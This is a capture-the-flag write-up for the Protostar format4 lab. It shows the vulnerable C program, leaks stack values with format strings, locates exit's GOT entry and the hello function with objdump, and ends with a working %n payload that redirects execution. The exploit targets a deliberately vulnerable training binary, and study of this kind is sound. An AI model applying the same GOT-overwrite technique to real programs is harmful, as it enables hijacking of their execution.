Protostar Format4 – Writeup

This is the last task of protostar format string vulnerable. I get a lot of experience from this lab. Thanks.

Description.

%p format4 looks at one method of redirecting execution in a process.

Hints

    objdump -TR is your friend

This level is at /opt/protostar/bin/format4

Format4.c

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void hello()
{
  printf("code execution redirected! you win\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);   
}

int main(int argc, char **argv)
{
  vuln();
}

This task is little different with previous task. Need to call hello function to get flag. let’s try.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%08x."*100')) | ./format4
AAAA00000200.b7fd8420.bffff614.41414141.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.

AAAA was located on position 4.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "AAAA"+"%4$08x."')) | ./format4
AAAA41414141.

In this task, we need to exit from function and call to hello function. so need to get the address of exit. we can use objdump again.

[email protected]:/opt/protostar/bin$ objdump -TR ./format4

./format4:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000  w   D  *UND*	00000000              __gmon_start__
00000000      DF *UND*	00000000  GLIBC_2.0   fgets
00000000      DF *UND*	00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*	00000000  GLIBC_2.0   _exit
00000000      DF *UND*	00000000  GLIBC_2.0   printf
00000000      DF *UND*	00000000  GLIBC_2.0   puts
00000000      DF *UND*	00000000  GLIBC_2.0   exit
080485ec g    DO .rodata	00000004  Base        _IO_stdin_used
08049730 g    DO .bss	00000004  GLIBC_2.0   stdin


DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit

Now,we got exit(1) address 0x08049724.

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%4$08x."')) | ./format4
$�08049724.

Now we need again hello function address.

[email protected]:/opt/protostar/bin$ objdump -t ./format4 | grep hello
080484b4 g     F .text	0000001e              hello

calculate it.

[email protected]:/opt/protostar/bin$ let x=0x080484b4; echo $x;
134513844

and remove 4 bytes. 134513844 – 4 = 134513840

[email protected]:/opt/protostar/bin$ (echo -e $(python -c 'print "\x24\x97\x04\x08"+"%134513840u"+"%4$08n"')) | ./format4


Bango! We got again! Thanks for reading. Happy Hacking.